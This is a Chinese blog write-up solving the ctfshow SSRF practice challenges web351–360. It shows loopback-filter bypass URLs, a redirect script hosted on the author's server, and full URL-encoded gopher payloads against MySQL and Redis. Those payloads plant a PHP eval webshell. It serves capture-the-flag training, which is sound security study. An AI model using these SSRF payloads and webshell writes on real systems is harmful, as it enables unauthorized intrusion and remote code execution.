ctfshow-ssrf writeup

已于 2022-09-17 14:30:42 修改
阅读量1.7k 收藏 6
点赞数 1
文章标签: 网络 安全
于 2022-09-17 14:02:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41274349/article/details/126904473
版权

参考链接:

参考链接:ctfshow web入门 SSRF(超详解)

ctfshow web入门 SSRF(超详解)_Yn8rt的博客-CSDN博客

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

题目:

web351:

payload:url=127.0.0.1/flag.php

 得到flag

web352:

过滤了localhost和127.0.0

​
url=http://0/flag.php

url=http://0.0.0.0/flag.php

url=http://0x7f.0.0.1/flag.php

url=http://0177.0.0.1/flag.php

url=http://127.1/flag.php


​

web353:

web354:

过滤了127 0 1 *

​
 url=http://sudo.cc/flag.php

​

web355:

限定了协议http或者https

同时主机名长度小于5

​
url=http://127.1/flag.php

url=http://0/flag.php

​

web356:

限定了协议http或者https

同时主机名长度小于3

​
url=http://0/flag.php

​

web357:

yum install httpd
yum install php php-devel

vps /var/www/html/下创建ssrf.php

ssrf.php内容:

<?php

header("Location: http://127.0.0.1/flag.php");

?>

注意:不但要安装httpd,还要安装php

[root@VM-4-10-centos ~]# yum install php php-devel

否则题目只会回显vps的ip,不会回显flag.

如下所示:

没有解析ssrf.php

 web358:

​
url=http://ctf.@127.0.0.1/flag.php?show

​

具体原理:如果不在ctf.后面加@,解析url时会把ctf.也解析成host的内容,如果不在show前面加#?,会把show也解析到path中,得不到想要的结果

web359:

题目提示:打无密码的mysql

点击题目的链接,进入如下界面,点击login

进入到check.php

下载gopherus脚本,注意运行环境python2

 https://github.com/tarunkant

命令:

python2 gopherus.py --exploit mysql

root

select '<?php eval($_POST[cmd]);?>' into outfile '/var/www/html/ssrf.php'

将gopher://127.0.0.1:3306/_后面的字符再进行一次url编码,然后执行

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4a%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%63%6d%64%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%73%72%66%2e%70%68%70%27%01%00%00%00%01

查看ssrf.php是否写入成功

 body中命令执行查看flag

web360:

题目提示:redis

题目:

利用gopherus脚本生成payload

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2430%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

 gopher://127.0.0.1:6379/_后面的字符再进行一次url编码,然后url传参,写入shell.php

 

在shell.php下查看flag的位置

 

查看flag的内容

 

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

小狐濡尾j
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow SSRF(web351-360)
Kradress的博客
03-17 639
表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。
CTFHub SSRF(服务器请求伪造) WriteUP
tangshuangsss的专栏
08-13 883
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介CTFHub 为网络安全工程师提供网络安全攻防技能培训、实战、技能提升等服务。「赛事中心」提供全网...
Gopherus工具的下载、使用
最新发布
weixin_68416970的博客
06-08 1013
Gopherus工具是网络安全领域中针对SSRF漏洞的一种有效利用手段,通过自动化地生成Gopher协议Payload,攻击者能够在一定程度上简化内网资源的探测和利用过程。然而,需要注意的是,此类工具的使用应当严格遵守法律法规,仅在授权情况下用于正当的安全评估目的。
CTFHub-SSRF-Writeup
liuhanzhe的专栏
12-15 2806
SSRF SSRF常见利用方式总结 内网访问 直接构造访问请求,获取flag /?url=127.0.0.1/flag.php 伪协议读取文件 根据题目提示使用file://协议,尝试一般web目录/var/www/html/ 端口扫描 提示端口范围8000到9000 /?url=127.0.0.1:8000 使用burpsuite对端口进行爆破,即可得到端口,访问获取flag POST请求 访问/?url=127.0.0.1/flag.ph,返回页面 包含一个form和隐藏的key,推测需要在fo
SSRF的一次浅学习(CTF-hub)
quan9i的博客
05-04 1087
网刃杯时签到题都没做出来,太菜了,特此来学习一下SSRF
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结
Love&Share
09-28 5692
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip
04-09
SSRF(Server-Side Request Forgery)前端挡光元件设计中的力学问题研究主要涉及软件开发与硬件工程的交叉领域,特别是在网络安全和机械结构设计方面。SSRF是一种利用服务器发起请求的安全漏洞,通常针对的是服务器...
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问.zip
04-09
开发技术-硬件
mars-ssrf:SSRFDedektörü
03-04
火星 SSRFDedektörü
exchange-ssrf-rce:交换服务
03-15
用法 python3 .\exchange-exp.py 使用方式: python PoC.py <target> ...[*] Getting ComputerName and DomainName [+] domain : xxx-xxxx | [+] computer : xxx.xxx-xxxx.xxx | [*] Getting LegacyDN ...
CTF刷题记录Buuctf-N1BOOK-SSRF
m_de_g的博客
06-23 1471
** N1BOOK-SQL2 ** 一、解题思路 1.查看页面源代码,发现了challenge.php 2.在进行ssrf攻击之前,先进行一波代码审计 3.根据题目要求,访问本机的flag.php,本道题是用了白名单的方式,通过parse_url()后分解出来的IP不能为白名单内的IP,所以我们主要需要绕过parse_url(),在线php调试 4.构造的payload为:http://fghkk@127.0.0.1:80@baidu.com/flag.php 5.当我使用get传参的方式时,
初识CTF Day4 CTFHUBSSRF
suxinAL的博客
10-02 2147
前言 这一次是对ssrf的探索,ctfhub技能树web就快结束了,期待淦进阶 正文 SSRF 内网访问 题目告诉访问127就直接访问下试试,但是没想到这么简单 ?url=127.0.0.1/flag.php 伪协议读取文件 题目提示:尝试去读取一下Web目录下的flag.php吧 可以联想到web目录一般是存放在 var/www/html/ 里面 所以payload如下 ?url=file:///var/www/html/flag.php 进入该页面,查看页面源代码得到flag 端口扫描 题目提示:来来
网鼎杯网络安全大赛玄武组_经典的一道CTF-WriteUP-SSRFME
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1579
刚完整复现一遍redis,然后重新打了一下这道题,SSRF+本地redis主从复制RCE组合拳拿shell 拿不到flag+反弹shell的惨案到此为止吧,跟我一步步拿shell,CTF-WriteUP-SSRFME redis漏洞利用姿势原文https://www.sec-in.com/article/1309 一、环境说明,buuoj靶场,https://buuoj.cn/ 攻击机kali-公网(普通的centos和ubuntu机子一样效果) 二、打靶机注意:现在buuoj的这台靶机已经可以出网了,有公
从0到1CTFer成长之路-第二章-SSRF漏洞
黑白的博客
03-01 739
SSRF漏洞 声明 好好向大佬们学习!!! 攻击 SSRF Training 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://72b1f71b-d44d-4562-8bac-db517053ebc4.node3.buuoj.cn 还挺像素的,点了一圈都没用,也就intersting challenge能点,点击出现源码,其实大概一看,这里应该就是通过网页提交url获取flag的.
【ctfhub-ssrf】内网访问
weixin_52116519的博客
04-28 713
题目 解题 理解 正常访问 存在ssrf漏洞
JDBC 获取数据库连接的方式一,二
weixin_52629592的博客
05-25 193
获取方式一: 通过实现Driver类的对象获取 package 获取方式; import java.sql.Connection; import java.sql.Driver; import java.sql.SQLException; import java.util.Properties; public class Test1 { public static void main(String[] args) throws SQLException { //..
ctfshow web入门-ssrf
akxnxbshai的博客
05-13 746
目录 开头: web 351 web 352 web 353 web 354 web 355 web 356 web 357 Web 358 Web 359 Web 360 开头: 简单了解一下SSRF。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统
ctfshow web入门ssrf
xiaolong22333的博客
04-28 879
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
ctfshow ssrf
08-16
- *3* [ctfshow ssrf](https://blog.csdn.net/weixin_52240463/article/details/122659261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值